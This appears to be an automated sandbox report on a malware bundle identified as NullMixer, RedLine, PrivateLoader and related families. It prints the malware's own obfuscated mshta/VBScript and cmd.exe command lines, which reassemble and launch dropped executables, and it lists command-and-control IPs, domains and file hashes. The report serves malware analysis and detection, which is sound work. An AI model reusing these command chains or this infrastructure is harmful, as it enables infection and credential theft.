"C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp" /SL5="$80016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp" /SL5="$90016,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 480
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| N/A | 127.0.0.1:49286 | tcp | |
| N/A | 127.0.0.1:49288 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.21.137.121:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| FR | 23.200.87.20:80 | crl.microsoft.com | tcp |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 23.200.86.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | ae5e11ff9817f4f3914d157238282145 |
| SHA1 | 0d3c1e692f917f09a15176eb5fe37ab9e16794b5 |
| SHA256 | de9fbfa62624a865ead2325021738eeef86631758847fc07944e0b3295513332 |
| SHA512 | bf2d1914e1615b70ee0a623786ca57c689e805fc932959f0e410821bdd86cbdeb2916d32a77dae11a7ec1418581fa82052f9ad81e7ada28765f0a65458e225d9 |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
| MD5 | 9b2134ee1ae45204587c324a88830c08 |
| SHA1 | 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6 |
| SHA256 | 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37 |
| SHA512 | 4055e2d5b5134079734b6c273292835ee557df6e4e1f26797084c7b737d99d7b6900b2f4e2563c5af8b051afffac9f2e18a60d57f11885444bf17f222170588d |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2620-67-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2620-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2620-80-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2620-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2620-79-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2620-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2620-86-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2620-85-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2620-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2620-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2620-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe
| MD5 | cd8b326d99a29d3c3586be7e51a33de9 |
| SHA1 | 5a50f0e17a398c6dc7c9c995826e7fe417762d07 |
| SHA256 | 0cd5a6958f291db7c078d25106a3265cce9aa53291c327ae1852a00b0d315049 |
| SHA512 | f5b75115291cf4fa15cb0a7a13a994bc18bd0195a2c088907fda270d6006f5e3bdf23aa482f0605cac381ceb15faab920daa0a143b5d448988b5055873d73c24 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe
| MD5 | 385ec35e040120516d0d8209c3058e6b |
| SHA1 | 15e04bcae85950c29ba2ae0311a3a444fa3954f5 |
| SHA256 | 4cda6584d780908c63ecd073f88160b7aa03cfbe240345e1e3d60b87bae21e36 |
| SHA512 | 211f04a84b08d1a696498a042fe1c61ccc212bfc4e88595a022145cfe8f228ed08d5d172b210854292dfec3cefb8efc6fcae62e4626a604209f0ea246cb28c7f |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu120bfbc2443b3b5d.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
| MD5 | 455c155c134be5785122eb4dd9966b57 |
| SHA1 | 2e9685a7511f53f236869378055d321896827b49 |
| SHA256 | 314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1 |
| SHA512 | 6a0620b30f6fa46ab26eaf06cee1a019d7bca836bc99f090de0c5df45ea6e84aa83070bc8f1f497ed074417702419c5aee00f6e0b40f777d6f6f8be3a69ce793 |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
| MD5 | a620135b51dda235d8cf29a7a0f24ef4 |
| SHA1 | 58eba3666c536215e3fc3660629dc63a999fe9e3 |
| SHA256 | 056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d |
| SHA512 | fc6eac7f772dc14e96e421a16ab48092032baef5bd734e3ba58923a3b124ddcd7d39c5f3c0fd7056f4ef03b4f087244fce3e63788d3ddbfd7f166b2348fff0aa |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe
| MD5 | 619aa73b97d9d55df2ab142b8a7d9ae4 |
| SHA1 | 8e6aee5e473f278855887aeae38323e2bbb23b21 |
| SHA256 | 8164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed |
| SHA512 | ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe
| MD5 | 9074b165bc9d453e37516a2558af6c9b |
| SHA1 | 11db0a256a502aa87d5491438775922a34fb9aa8 |
| SHA256 | 3ffdaa1515622897c84111ab4180de09aadd03674935555270a2789625f7e513 |
| SHA512 | ee0b950587c5a16a3c255f4c6b333e65cc2ada8429efc27e02165f4b3402fbd257a67f5adb8a3ffc1c4a4c95ecf2582da5ffbcb64322107e0e664ac7c388b62b |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe
| MD5 | 929f431a5093b6ba736d6d17216f237a |
| SHA1 | 19cd747e4aa9f185eca3656a4d3ef7d28a9a279f |
| SHA256 | 5650aab287506d1139b3a5511f012cc4fa2b152f49cb17fe653ddbc821fee8bc |
| SHA512 | 9c0ffde8b9cfe579584e03d21c11a6d60d03a18da75315c40a4370d05cefa9e728c84a0668b8d03e7fe7afb0020adcb84803f63b508a72df868605d89fc7e4e8 |
\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/2004-128-0x00000000001A0000-0x00000000001A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LG6RW4EBNOKB77EFWRSO.temp
| MD5 | 9f7178e5c937db2e94a7533a1ae0a795 |
| SHA1 | adb72ef48c8e8274ddfd7cd9417d3a6837a7ad0f |
| SHA256 | 55f882bacfefbc32b55f14725afa47979d1fe0477e8d51cf83ccb86d580c4429 |
| SHA512 | 33679465a36c345e939c5d93da15be28ccb6a20f5b1c716e4b0b6e62511f8ea21f511900ec29464f64c8b97c8335201ad80953dbdd5f21e9a5bdc72eddb868c0 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe
| MD5 | c1071152823c75363b1fc55759ef2b8a |
| SHA1 | 463ab5487ef7e9e170491dd79e8ab75b2f782ad6 |
| SHA256 | c9ce0e9a228fc8069fc40c7a1cbcf764a1755ac3c26e1ab50b623c55035287fd |
| SHA512 | f4e52c4191128a32ff7ea3b3c06df0d8b648c7ef7e1167ede966a0399401693d7b25ab57393e915b66ff16e5b9ce62e100045e66e0f364673e2a16025de15994 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
| MD5 | d75800977e3ec3199509eb2e0a6a28f5 |
| SHA1 | 3edc49c3a466f3bbc977c42406fbd5c90d49e462 |
| SHA256 | 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b |
| SHA512 | 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749 |
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/1724-135-0x0000000000060000-0x00000000000C6000-memory.dmp
memory/2620-78-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1212-137-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2116-136-0x00000000012C0000-0x000000000132A000-memory.dmp
memory/2072-147-0x00000000008F0000-0x0000000000960000-memory.dmp
memory/1000-143-0x0000000000F10000-0x0000000000F2C000-memory.dmp
memory/1212-158-0x0000000000400000-0x0000000000414000-memory.dmp
memory/488-156-0x0000000000400000-0x0000000000414000-memory.dmp
memory/920-155-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1156-151-0x0000000000400000-0x0000000002F01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1000-162-0x0000000000220000-0x0000000000226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PPA67.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-PPA67.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/1524-199-0x0000000002780000-0x0000000002915000-memory.dmp
memory/2620-200-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2620-204-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2620-208-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2620-207-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2620-206-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2620-201-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1524-209-0x0000000002CA0000-0x0000000002D45000-memory.dmp
memory/2744-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2744-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2744-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2744-218-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2744-216-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2808-233-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2744-214-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2744-212-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2744-210-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1524-239-0x0000000000240000-0x00000000002D2000-memory.dmp
memory/1524-236-0x0000000000240000-0x00000000002D2000-memory.dmp
memory/2808-235-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2808-232-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2808-231-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2808-229-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2808-227-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2808-225-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2808-223-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-253-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-252-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-251-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1640-249-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-247-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1640-255-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabB28.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win10v2004-20241007-en
Max time kernel
88s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe | N/A |
